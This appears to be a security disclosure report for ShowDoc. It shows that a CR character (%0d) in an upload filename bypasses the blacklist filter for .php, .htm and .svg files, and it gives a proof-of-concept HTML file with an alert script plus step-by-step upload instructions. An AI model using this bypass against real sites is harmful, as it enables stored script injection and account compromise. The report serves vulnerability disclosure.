There is a filter to prevent upload php, HTML, svg
filetype in the code snippet from line 115 to line 122 in AttachmentController.class.php
:
if (strstr(strip_tags(strtolower($uploadFile['name'])), ".php")
|| strstr(strip_tags(strtolower($uploadFile['name'])), ".htm")
|| strstr(strip_tags(strtolower($uploadFile['name'])), ".svg")
) {
$this->sendError(10100,'δΈζ―ζζ€ζδ»Άη±»ε');
return false;
}
However, I found a way to bypass this filter via uploading arbitrary files with those filetypes by using %0d
character in the filename.
Create an malicious HTML file and named it phish.h%0dtml
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Test Upload File</title>
</head>
<body>
<h1>Test upload</h1>
<script>alert(1)</script>
</body>
</html>
Now after login, click the arrow on the top right corner -> go to File Library. (https://www.showdoc.com.cn/attachment/index
)
In the File Library page, click Upload button and choose the phish.h%0dtml
After uploading successfully, click on the check button to open it in a new tab.
You will see that the HTML file is executed, this will happen the same with other filetypes.
This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the userβs device.